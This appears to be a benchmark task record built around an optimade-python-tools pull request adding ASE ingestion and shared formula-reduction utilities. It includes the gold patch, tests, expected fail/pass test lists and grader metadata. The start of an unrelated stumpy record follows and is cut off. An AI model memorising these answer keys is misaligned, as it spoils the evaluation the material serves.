+ return cls( + { + "attributes": cls._type_ingesters[format](data).dict(), + "id": "", + "type": "structures", + } + ) + @staticmethod def _get_model_attributes( starting_instances: Union[Tuple[BaseModel, ...], List[BaseModel]], name: str diff --git a/optimade/adapters/structures/adapter.py b/optimade/adapters/structures/adapter.py index 5e9d8780..4ae62249 100644 --- a/optimade/adapters/structures/adapter.py +++ b/optimade/adapters/structures/adapter.py @@ -4,10 +4,12 @@ from optimade.adapters.base import EntryAdapter from optimade.models import StructureResource from .aiida import get_aiida_structure_data -from .ase import get_ase_atoms +from .ase import Atoms as ASEAtoms +from .ase import from_ase_atoms, get_ase_atoms from .cif import get_cif from .jarvis import get_jarvis_atoms from .proteindatabank import get_pdb, get_pdbx_mmcif +from .pymatgen import Structure as PymatgenStructure from .pymatgen import from_pymatgen, get_pymatgen @@ -55,4 +57,10 @@ class Structure(EntryAdapter): _type_ingesters: Dict[str, Callable] = { "pymatgen": from_pymatgen, + "ase": from_ase_atoms, + } + + _type_ingesters_by_type: Dict[str, Type] = { + "pymatgen": PymatgenStructure, + "ase": ASEAtoms, } diff --git a/optimade/adapters/structures/ase.py b/optimade/adapters/structures/ase.py index 93ea84bf..020487ed 100644 --- a/optimade/adapters/structures/ase.py +++ b/optimade/adapters/structures/ase.py @@ -10,10 +10,17 @@ For more information on the ASE code see [their documentation](https://wiki.fysi from typing import Dict from optimade.adapters.exceptions import ConversionError -from optimade.adapters.structures.utils import species_from_species_at_sites +from optimade.adapters.structures.utils import ( + elements_ratios_from_species_at_sites, + species_from_species_at_sites, +) from optimade.models import Species as OptimadeStructureSpecies from optimade.models import StructureFeatures from optimade.models import StructureResource as OptimadeStructure +from optimade.models.structures import StructureResourceAttributes +from optimade.models.utils import anonymize_formula, reduce_formula + +EXTRA_FIELD_PREFIX = "ase" try: from ase import Atom, Atoms @@ -26,7 +33,7 @@ except (ImportError, ModuleNotFoundError): ASE_NOT_FOUND = "ASE not found, cannot convert structure to an ASE Atoms" -__all__ = ("get_ase_atoms",) +__all__ = ("get_ase_atoms", "from_ase_atoms") def get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms: @@ -82,6 +89,69 @@ def get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms: atoms.append(Atom(symbol=species_name, position=site, mass=mass)) + info = {} + for key in attributes.dict().keys(): + if key.startswith("_"): + ase_key = key + if key.startswith(f"_{EXTRA_FIELD_PREFIX}_"): + ase_key = "".join(key.split(f"_{EXTRA_FIELD_PREFIX}_")[1:]) + info[ase_key] = getattr(attributes, key) + return Atoms( - symbols=atoms, cell=attributes.lattice_vectors, pbc=attributes.dimension_types + symbols=atoms, + cell=attributes.lattice_vectors, + pbc=attributes.dimension_types, + info=info if info else None, + ) + + +def from_ase_atoms(atoms: Atoms) -> StructureResourceAttributes: + """Convert an ASE `Atoms` object into an OPTIMADE `StructureResourceAttributes` model. + + Parameters: + atoms: The ASE `Atoms` object to convert. + + Returns: + An OPTIMADE `StructureResourceAttributes` model, which can be converted to a raw Python + dictionary with `.dict()` or to JSON with `.json()`. + + """ + if not isinstance(atoms, Atoms): + raise RuntimeError( + f"Cannot convert type {type(atoms)} into an OPTIMADE `StructureResourceAttributes` model." + ) + + attributes = {} + attributes["cartesian_site_positions"] = atoms.positions.tolist() + attributes["lattice_vectors"] = atoms.cell.tolist() + attributes["species_at_sites"] = atoms.get_chemical_symbols() + attributes["elements_ratios"] = elements_ratios_from_species_at_sites( + attributes["species_at_sites"] + ) + attributes["species"] = species_from_species_at_sites( + attributes["species_at_sites"] ) + attributes["dimension_types"] = [int(_) for _ in atoms.pbc.tolist()] + attributes["nperiodic_dimensions"] = sum(attributes["dimension_types"]) + attributes["nelements"] = len(attributes["species"]) + attributes["elements"] = sorted([_.name for _ in attributes["species"]]) + attributes["nsites"] = len(attributes["species_at_sites"]) + + attributes["chemical_formula_descriptive"] = atoms.get_chemical_formula() + attributes["chemical_formula_reduced"] = reduce_formula( + atoms.get_chemical_formula() + ) + attributes["chemical_formula_anonymous"] = anonymize_formula( + attributes["chemical_formula_reduced"], + ) + attributes["last_modified"] = None + attributes["immutable_id"] = None + attributes["structure_features"] = [] + + for key in atoms.info: + optimade_key = key.lower() + if not key.startswith(f"_{EXTRA_FIELD_PREFIX}"): + optimade_key = f"_{EXTRA_FIELD_PREFIX}_{optimade_key}" + attributes[optimade_key] = atoms.info[key] + + return StructureResourceAttributes(**attributes) diff --git a/optimade/adapters/structures/pymatgen.py b/optimade/adapters/structures/pymatgen.py index 274c40f5..8d46bf7f 100644 --- a/optimade/adapters/structures/pymatgen.py +++ b/optimade/adapters/structures/pymatgen.py @@ -16,9 +16,10 @@ from optimade.adapters.structures.utils import ( from optimade.models import Species as OptimadeStructureSpecies from optimade.models import StructureResource as OptimadeStructure from optimade.models import StructureResourceAttributes +from optimade.models.utils import anonymize_formula, reduce_formula try: - from pymatgen.core import Composition, Lattice, Molecule, Structure + from pymatgen.core import Lattice, Molecule, Structure except (ImportError, ModuleNotFoundError): from warnings import warn @@ -168,14 +169,14 @@ def from_pymatgen(pmg_structure: Structure) -> StructureResourceAttributes: attributes["dimension_types"] = [int(_) for _ in pmg_structure.lattice.pbc] attributes["nperiodic_dimensions"] = sum(attributes["dimension_types"]) attributes["nelements"] = len(pmg_structure.composition.elements) - attributes["chemical_formula_anonymous"] = _pymatgen_anonymized_formula_to_optimade( - pmg_structure.composition + attributes["chemical_formula_anonymous"] = anonymize_formula( + pmg_structure.composition.formula ) attributes["elements"] = sorted( [_.symbol for _ in pmg_structure.composition.elements] ) - attributes["chemical_formula_reduced"] = _pymatgen_reduced_formula_to_optimade( - pmg_structure.composition + attributes["chemical_formula_reduced"] = reduce_formula( + pmg_structure.composition.formula ) attributes["chemical_formula_descriptive"] = pmg_structure.composition.formula attributes["elements_ratios"] = [ @@ -188,33 +189,3 @@ def from_pymatgen(pmg_structure: Structure) -> StructureResourceAttributes: attributes["structure_features"] = [] return StructureResourceAttributes(**attributes) - - -def _pymatgen_anonymized_formula_to_optimade(composition: Composition) -> str: - """Construct an OPTIMADE `chemical_formula_anonymous` from a pymatgen `Composition`.""" - import re - - from optimade.models.utils import anonymous_element_generator - - return "".join( - [ - "".join(x) - for x in zip( - anonymous_element_generator(), - reversed(re.split("[A-Z]", composition.anonymized_formula)[1:]), - ) - ] - ) - - -def _pymatgen_reduced_formula_to_optimade(composition: Composition) -> str: - """Construct an OPTIMADE `chemical_formula_reduced` from a pymatgen `Composition`.""" - import numpy - - numbers = [int(_) for _ in composition.to_reduced_dict.values()] - gcd = numpy.gcd.reduce(numbers) - return "".join( - _ - + f"{int(composition.to_reduced_dict[_]) // gcd if composition.to_reduced_dict[_] // gcd > 1 else ''}" - for _ in sorted([_.symbol for _ in composition.elements]) - ) diff --git a/optimade/adapters/structures/utils.py b/optimade/adapters/structures/utils.py index 0c2bf9f3..2b36570b 100644 --- a/optimade/adapters/structures/utils.py +++ b/optimade/adapters/structures/utils.py @@ -355,3 +355,14 @@ def species_from_species_at_sites( OptimadeStructureSpecies(name=_, concentration=[1.0], chemical_symbols=[_]) for _ in set(species_at_sites) ] + + +def elements_ratios_from_species_at_sites(species_at_sites: List[str]) -> List[float]: + """Compute the OPTIMADE `elements_ratios` field from `species_at_sites` in the case where `species_at_sites` refers + to sites wholly occupied by the given elements, e.g., not arbitrary species labels or with partial/mixed occupancy. + + """ + elements = set(species_at_sites) + counts = {e: species_at_sites.count(e) for e in elements} + num_sites = len(species_at_sites) + return [counts[e] / num_sites for e in sorted(elements)] diff --git a/optimade/models/structures.py b/optimade/models/structures.py index c9424254..aa89afe6 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -1,10 +1,7 @@ # pylint: disable=no-self-argument,line-too-long,no-name-in-module -import math import re -import sys import warnings from enum import Enum, IntEnum -from functools import reduce from typing import List, Optional, Union from pydantic import BaseModel, conlist, root_validator, validator @@ -18,6 +15,7 @@ from optimade.models.utils import ( OptimadeField, StrictField, SupportLevel, + reduce_formula, ) from optimade.warnings import MissingExpectedField @@ -895,18 +893,10 @@ The properties of the species are found in the property `species`. if value is None: return value - numbers = [n.strip() or 1 for n in re.split(r"[A-Z][a-z]*", value)] - # Need to remove leading 1 from split and convert to ints - numbers = [int(n) for n in numbers[1:]] - - if sys.version_info[1] >= 9: - gcd = math.gcd(*numbers) - else: - gcd = reduce(math.gcd, numbers) - - if gcd != 1: + reduced_formula = reduce_formula(value) + if reduced_formula != value: raise ValueError( - f"{field.name} {value!r} is not properly reduced: greatest common divisor was {gcd}, expected 1." + f"{field.name} {value!r} is not properly reduced: expected {reduced_formula!r}." ) return value diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 0474cdf9..8967b6d5 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -1,9 +1,11 @@ import inspect import itertools +import math import re import warnings from enum import Enum -from typing import TYPE_CHECKING, Optional +from functools import reduce +from typing import TYPE_CHECKING, List, Optional from pydantic import Field from pydantic.fields import FieldInfo @@ -228,6 +230,63 @@ def anonymous_element_generator(): yield "".join(s) +def _reduce_or_anonymize_formula( + formula: str, alphabetize: bool = True, anonymize: bool = False +) -> str: + """Takes an input formula, reduces it and either alphabetizes or anonymizes it.""" + import re + import sys + + numbers: List[int] = [ + int(n.strip() or 1) for n in re.split(r"[A-Z][a-z]*", formula)[1:] + ] + # Need to remove leading 1 from split and convert to ints + + species = re.findall("[A-Z][a-z]*", formula) + + if sys.version_info[1] >= 9: + gcd = math.gcd(*numbers) + else: + gcd = reduce(math.gcd, numbers) + + if not len(species) == len(numbers): + raise ValueError(f"Something is wrong with the input formula: {formula}") + + numbers = [n // gcd for n in numbers] + + if anonymize: + numbers = sorted(numbers, reverse=True) + species = [s for _, s in zip(numbers, anonymous_element_generator())] + + elif alphabetize: + species, numbers = zip(*sorted(zip(species, numbers))) + + return "".join(f"{s}{n if n != 1 else ''}" for n, s in zip(numbers, species)) + + +def anonymize_formula(formula: str) -> str: + """Takes a string representation of a chemical formula of the form `[A-Z][a-z]*[0-9]*` (potentially with whitespace) and + returns the OPTIMADE `chemical_formula_anonymous` representation, i.e., a reduced chemical formula comprising of element symbols + drawn from A, B, C... ordered from largest proportion to smallest. + + Returns: + The anonymous chemical formula in the OPTIMADE representation. + + """ + return _reduce_or_anonymize_formula(formula, alphabetize=False, anonymize=True) + + +def reduce_formula(formula: str) -> str: + """Takes a string representation of a chemical formula of the form `[A-Z][a-z]*[0-9]*` (potentially with whitespace) and + reduces it by the GCD of the proportion integers present in the formula, stripping any leftover "1" values. + + Returns: + The reduced chemical formula in the OPTIMADE representation. + + """ + return _reduce_or_anonymize_formula(formula, alphabetize=True, anonymize=False) + + ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) """ Returns the first 150 values of the anonymous element generator. """
Add ASE ingester and generalize other ingestion utilities This PR adds `from_ase` as a new ingester type (following #1296 for pymatgen) and generalises the ingester functionality into a `.ingest_from` method of the base adapter, e.g., ```python from optimade.adapters import Structure atoms = ase.Atoms(...) structure = pymatgen.core.Structure(...) Structure.ingest_from(atoms) # implicit type detection Structure.ingest_from(structure) # implicit type detection Structure.ingest_from(atoms, "ase") # use key into ingester dict to specify Structure.ingest_from(pymatgen, "pymatgen") # use key into ingester dict to specify ``` Also adds several utilities for e.g., normalizing formulae and other fields. These are now used in the adapters and spread across various utils modules (to avoid circular imports).
**Title** Add unified ingestion API and ASE support; centralize formula handling **Problem** The library only provided a specific ingester for pymatgen, lacking a generic entry‑point and support for ASE structures. Formula reduction and anonymization logic was duplicated across modules, leading to inconsistent validation. **Root Cause** Ingestion was spread over separate functions and dictionaries, and formula utilities were reimplemented instead of shared, preventing automatic type detection and consistent formula processing. **Fix / Expected Behavior** - Introduce a class‑level `ingest_from` method that detects the source type or accepts an explicit format key. - Register ASE as a valid ingestion source alongside pymatgen, with proper type mappings. - Populate extra ASE metadata into the OPTIMADE structure while preserving existing fields. - Provide a new utility to compute element ratios from site occupancies. - Consolidate formula reduction and anonymization into shared helpers used by both adapters and model validators. **Risk & Validation** - Verify that existing pymatgen ingestion continues to work unchanged. - Add tests exercising `ingest_from` with both ASE and pymatgen inputs, including implicit detection. - Confirm that reduced and anonymous formula validation now passes for all supported formats.
1,509
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_ase.py b/tests/adapters/structures/test_ase.py index a2062b2c..8e4103c8 100644 --- a/tests/adapters/structures/test_ase.py +++ b/tests/adapters/structures/test_ase.py @@ -45,3 +45,23 @@ def test_special_species(SPECIAL_SPECIES_STRUCTURES): def test_null_species(null_species_structure): """Make sure null species are handled""" assert isinstance(get_ase_atoms(null_species_structure), Atoms) + + +def test_extra_info_keys(RAW_STRUCTURES): + """Test that provider fields/ASE metadata is preserved during conversion.""" + structure = RAW_STRUCTURES[0] + structure["attributes"]["_ase_key"] = "some value" + structure["attributes"]["_ase_another_key"] = [1, 2, 3] + structure["attributes"]["_key_without_ase_prefix"] = [4, 5, 6] + + atoms = Structure(structure).as_ase + assert atoms.info["key"] == "some value" + assert atoms.info["another_key"] == [1, 2, 3] + assert atoms.info["_key_without_ase_prefix"] == [4, 5, 6] + + roundtrip_structure = Structure.ingest_from(atoms).attributes.dict() + assert roundtrip_structure["_ase_key"] == "some value" + assert roundtrip_structure["_ase_another_key"] == [1, 2, 3] + + # This key should have the _ase prefix re-added + assert roundtrip_structure["_ase__key_without_ase_prefix"] == [4, 5, 6] diff --git a/tests/adapters/structures/test_pymatgen.py b/tests/adapters/structures/test_pymatgen.py index b27de65c..f51c6649 100644 --- a/tests/adapters/structures/test_pymatgen.py +++ b/tests/adapters/structures/test_pymatgen.py @@ -18,7 +18,6 @@ from optimade.adapters import Structure from optimade.adapters.structures.pymatgen import ( _get_molecule, _get_structure, - from_pymatgen, get_pymatgen, ) @@ -56,29 +55,3 @@ def test_special_species(SPECIAL_SPECIES_STRUCTURES): def test_null_species(null_species_structure): """Make sure null species are handled""" assert isinstance(get_pymatgen(null_species_structure), PymatgenStructure) - - -def test_successful_ingestion(RAW_STRUCTURES): - import numpy as np - - lossy_keys = ( - "chemical_formula_descriptive", - "chemical_formula_hill", - "last_modified", - "assemblies", - "attached", - "immutable_id", - "species", - "fractional_site_positions", - ) - array_keys = ("cartesian_site_positions", "lattice_vectors") - for structure in RAW_STRUCTURES: - converted = from_pymatgen(get_pymatgen(Structure(structure))).dict() - for k in converted: - if k not in lossy_keys: - if k in array_keys: - np.testing.assert_almost_equal( - converted[k], structure["attributes"][k] - ) - else: - assert converted[k] == structure["attributes"][k] diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index fd82033c..0a96f57b 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -1,4 +1,5 @@ """Test Structure adapter""" + import pytest from optimade.adapters import Structure @@ -146,3 +147,88 @@ def test_common_converters(raw_structure, RAW_STRUCTURES): raw_structure_property_set = set(raw_structure.keys()) resource_property_set = set(Structure(raw_structure).as_dict.keys()) assert raw_structure_property_set.issubset(resource_property_set) + + +def compare_lossy_conversion(structure_attributes, reconverted_structure_attributes): + """Compare two structures, allowing for some loss of information and mapping of prefixed keys.""" + + try: + import numpy as np + except ImportError: + pytest.node.warn( + pytest.PytestWarning( + "numpy not found, some cases of conversion tests will be skipped" + ) + ) + np = None + + lossy_keys = ( + "chemical_formula_descriptive", + "chemical_formula_hill", + "last_modified", + "assemblies", + "attached", + "immutable_id", + "species", + "fractional_site_positions", + ) + array_keys = ("cartesian_site_positions", "lattice_vectors") + + for k in reconverted_structure_attributes: + if k not in lossy_keys: + if k in array_keys and np is not None: + np.testing.assert_almost_equal( + reconverted_structure_attributes[k], structure_attributes[k] + ) + elif k.startswith("_"): + # ugly way of checking if a substring exists in the initial structure + for i in range(len(k)): + subkey = k[i:] + if subkey in structure_attributes: + assert ( + reconverted_structure_attributes[k] + == structure_attributes[subkey] + ) + break + else: + raise ValueError(f"No subkey of {k} was found in initial structure") + + else: + assert reconverted_structure_attributes[k] == structure_attributes[k] + + +@pytest.mark.parametrize( + "format", + [k for k in Structure._type_ingesters.keys() if k in Structure._type_converters], +) +def test_two_way_conversion(RAW_STRUCTURES, format): + for structure in RAW_STRUCTURES: + new_structure = Structure(structure) + converted_structure = new_structure.convert(format) + if converted_structure is None: + continue + reconverted_structure = Structure.ingest_from( + converted_structure, format + ).entry.dict() + compare_lossy_conversion( + structure["attributes"], reconverted_structure["attributes"] + ) + + +@pytest.mark.parametrize( + "format", + [k for k in Structure._type_ingesters.keys() if k in Structure._type_converters], +) +def test_two_way_conversion_with_implicit_type(RAW_STRUCTURES, format): + for structure in RAW_STRUCTURES: + new_structure = Structure(structure) + converted_structure = new_structure.convert(format) + if converted_structure is None: + continue + reconverted_structure = Structure.ingest_from( + converted_structure, format=None + ).entry.dict() + + compare_lossy_conversion( + structure["attributes"], reconverted_structure["attributes"] + ) diff --git a/tests/adapters/structures/test_utils.py b/tests/adapters/structures/test_utils.py index 5cb1e763..107c90b1 100644 --- a/tests/adapters/structures/test_utils.py +++ b/tests/adapters/structures/test_utils.py @@ -162,3 +162,19 @@ def test_species_from_species_at_sites(): ], key=lambda _: _["name"], ) + + +def test_elements_ratios_from_sites(): + import numpy as np + + from optimade.adapters.structures.utils import elements_ratios_from_species_at_sites + + assert np.allclose(elements_ratios_from_species_at_sites(["Si"]), [1.0]) + assert np.allclose(elements_ratios_from_species_at_sites(["Si", "Ge"]), [0.5, 0.5]) + assert np.allclose( + elements_ratios_from_species_at_sites(["Si", "Si", "Ge"]), [1 / 3, 2 / 3] + ) + assert np.allclose( + elements_ratios_from_species_at_sites(["Si", "Si", "Ge", "C", "C"]), + [0.4, 0.2, 0.4], + ) diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index 60f81156..213dfd5e 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -158,15 +158,15 @@ deformities = ( ), ( {"chemical_formula_reduced": "Ge2Si2"}, - "chemical_formula_reduced 'Ge2Si2' is not properly reduced: greatest common divisor was 2, expected 1.", + "chemical_formula_reduced 'Ge2Si2' is not properly reduced: expected 'GeSi'.", ), ( {"chemical_formula_reduced": "Ge144Si60V24"}, - "chemical_formula_reduced 'Ge144Si60V24' is not properly reduced: greatest common divisor was 12, expected 1.", + "chemical_formula_reduced 'Ge144Si60V24' is not properly reduced: expected 'Ge12Si5V2'.", ), ( {"chemical_formula_anonymous": "A10B5C5"}, - "chemical_formula_anonymous 'A10B5C5' is not properly reduced: greatest common divisor was 5, expected 1.", + "chemical_formula_anonymous 'A10B5C5' is not properly reduced: expected 'A2BC'", ), ( {"chemical_formula_anonymous": "A44B15C9D4E3F2GHI0J0K0L0"}, diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py index 9374b16d..1b4cbaf5 100644 --- a/tests/models/test_utils.py +++ b/tests/models/test_utils.py @@ -116,3 +116,25 @@ def test_formula_regexp(): for formula in bad_formulae: with pytest.raises(ValidationError): assert DummyModel(formula=formula) + + +def test_reduce_formula(): + from optimade.models.utils import reduce_formula + + assert reduce_formula("Si1O2") == "O2Si" + assert reduce_formula("Si11O2") == "O2Si11" + assert reduce_formula("Si10O2C4") == "C2OSi5" + assert reduce_formula("Li1") == "Li" + assert reduce_formula("Li1Ge1") == "GeLi" + + +def test_anonymize_formula(): + from optimade.models.utils import anonymize_formula + + assert anonymize_formula("Si1O2") == "A2B" + assert anonymize_formula("Si11O2") == "A11B2" + assert anonymize_formula("Si10O2C4") == "A5B2C" + + assert anonymize_formula("Si1 O2") == "A2B" + assert anonymize_formula("Si11 O2") == "A11B2" + assert anonymize_formula("Si10 O2C4") == "A5B2C"
[ "tests/adapters/structures/test_structures.py::test_two_way_conversion[ase]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[ase]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity24]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity25]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity26]", "tests/models/test_utils.py::test_reduce_formula", "tests/models/test_utils.py::test_anonymize_formula" ]
[ "tests/adapters/structures/test_structures.py::test_instantiate", "tests/adapters/structures/test_structures.py::test_setting_entry", "tests/adapters/structures/test_structures.py::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::test_getattr_order", "tests/adapters/structures/test_structures.py::test_no_module_conversion", "tests/adapters/structures/test_structures.py::test_common_converters", "tests/adapters/structures/test_structures.py::test_two_way_conversion[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[pymatgen]", "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity27]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]", "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field", "tests/models/test_utils.py::test_formula_regexp" ]
Method: EntryAdapter.ingest_from(cls, data: Any, format: Optional[str] = None) Location: optimade.adapters.base.EntryAdapter (class method) Inputs: - **data** (Any): The object to be ingested (e.g., an ASE Atoms instance, a pymatgen Structure, etc.). - **format** (Optional[str]): Explicit key identifying the ingester to use (e.g., "ase", "pymatgen"). If omitted, the method attempts to infer the correct ingester by matching the type of *data* against the registered `_type_ingesters_by_type` mapping. Outputs: - Returns an instance of the calling adapter class (e.g., `Structure`) containing the ingested OPTIMADE entry (wrapped as a `StructureResource` with populated `attributes`). Description: Converts external structural data into the internal OPTIMADE representation, either by explicit format selection or by automatic type detection, and returns a fully‑initialised adapter object. Function: from_ase_atoms(atoms) Location: optimade.adapters.structures.ase Inputs: - **atoms** (ase.Atoms): An ASE Atoms object containing atomic positions, cell information, periodicity, and optional user‑defined `info` dictionary. Outputs: - **StructureResourceAttributes**: A populated OPTIMADE `StructureResourceAttributes` model (convertible to dict/JSON) containing lattice vectors, site positions, species information, elemental ratios, chemical formulas, dimensionality, and any ASE‑specific metadata re‑keyed with the `_ase_` prefix. Description: Translates an ASE Atoms object into the canonical OPTIMADE structure attributes, extracting both structural data and any custom metadata stored in `atoms.info`. Function: elements_ratios_from_species_at_sites(species_at_sites) Location: optimade.adapters.structures.utils Inputs: - **species_at_sites** (List[str]): List of element symbols (or species labels) ordered per atomic site, e.g., `["Si", "Ge", "Si"]`. Outputs: - **List[float]**: Ratios of each distinct element in the structure, sorted alphabetically by element symbol (e.g., for `["Si","Ge","Si"]` → `[0.666...,0.333...]` for Si then Ge). Description: Computes the `elements_ratios` field required by the OPTIMADE schema from a simple list of site‑wise element symbols, assuming full occupancy per site. Function: reduce_formula(formula) Location: optimade.models.utils Inputs: - **formula** (str): A chemical formula string (e.g., `"Si10O2C4"`), optionally containing whitespace. Outputs: - **str**: The formula reduced by the greatest common divisor of its stoichiometric integers and alphabetically ordered, with any trailing “1” omitted (e.g., `"C2OSi5"`). Description: Normalises chemical formulas to the OPTIMADE reduced representation, ensuring consistent ordering and removal of redundant unit factors. Function: anonymize_formula(formula) Location: optimade.models.utils Inputs: - **formula** (str): A chemical formula string (e.g., `"Si10O2C4"`), optionally containing whitespace. Outputs: - **str**: An anonymous OPTIMADE formula where element symbols are replaced by sequential letters (A, B, …) ordered by decreasing proportion (e.g., `"A5B2C"`). Description: Produces the `chemical_formula_anonymous` representation required by OPTIMADE by reducing the formula then mapping elements to anonymous identifiers based on their relative amounts.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_ase.py tests/adapters/structures/test_pymatgen.py tests/adapters/structures/test_structures.py tests/adapters/structures/test_utils.py tests/models/test_structures.py tests/models/test_utils.py" }
{ "num_modified_files": 8, "num_modified_lines": 211, "pr_author": "ml-evs", "pr_labels": [ "enhancement: New feature or request", "adapters: Issues pertaining to adapters (converters)", "ergonomics: Features that improve the usability of the package" ], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding an ASE ingester and generalising ingestion utilities, which aligns with the new `ingest_from` method and related changes. However, the test suite asserts specific naming conventions for ASE metadata keys (e.g., handling of _ase_ prefixes and double‑underscore re‑addition) and revised formula reduction messages that are not described in the issue text, indicating an implicit naming requirement. Therefore the task is classified as B2 (implicit naming).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect ASE info keys to be transformed with a leading '_ase_' prefix and re‑added with double underscores for keys missing the prefix.", "Tests check that formula reduction error messages use the reduced formula string rather than the original GCD description." ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
99988be3f81672a05264f987cb0026fc9d10b91c
2020-03-03 14:04:30
tdameritrade__stumpy-137
diff --git a/stumpy/mstump.py b/stumpy/mstump.py index 5ee2447..9e00372 100644 --- a/stumpy/mstump.py +++ b/stumpy/mstump.py @@ -12,10 +12,10 @@ from . import core logger = logging.getLogger(__name__) -def _multi_mass(Q, T, m, M_T, Σ_T, trivial_idx, excl_zone): +def _multi_mass(Q, T, m, M_T, Σ_T): """ A multi-dimensional wrapper around "Mueen's Algorithm for Similarity Search" - (MASS) to compute multi-dimensional MASS. + (MASS) to compute multi-dimensional distance profile. Parameters ---------- @@ -34,54 +34,29 @@ def _multi_mass(Q, T, m, M_T, Σ_T, trivial_idx, excl_zone): Σ_T : ndarray Sliding standard deviation for `T` - trivial_idx : int - Index for the start of the trivial self-join - - excl_zone : int - The half width for the exclusion zone relative to the `trivial_idx`. - If the `trivial_idx` is `None` then this parameter is ignored. - Returns ------- - P : ndarray - Multi-dimensional matrix profile - - I : ndarray - Multi-dimensional matrix profile indices + D : ndarray + Multi-dimensional distance profile """ - d = T.shape[0] - n = T.shape[1] + d, n = T.shape k = n - m + 1 - P = np.full((d, k), np.inf, dtype="float64") D = np.empty((d, k), dtype="float64") - I = np.ones((d, k), dtype="int64") * -1 for i in range(d): D[i, :] = core.mass(Q[i], T[i], M_T[i], Σ_T[i]) - zone_start = max(0, trivial_idx - excl_zone) - zone_stop = min(k, trivial_idx + excl_zone) - D[:, zone_start : zone_stop + 1] = np.inf - # Column-wise sort - # row_idx = np.argsort(D, axis=0) - # D = D[row_idx, np.arange(row_idx.shape[1])] D = np.sort(D, axis=0) D_prime = np.zeros(k) for i in range(d): - D_prime = D_prime + D[i] - D_prime_prime = D_prime / (i + 1) - # Element-wise Min - # col_idx = np.argmin([P[i, :], D_prime_prime], axis=0) - # col_mask = col_idx > 0 - col_mask = P[i] > D_prime_prime - P[i, col_mask] = D_prime_prime[col_mask] - I[i, col_mask] = trivial_idx + D_prime[:] 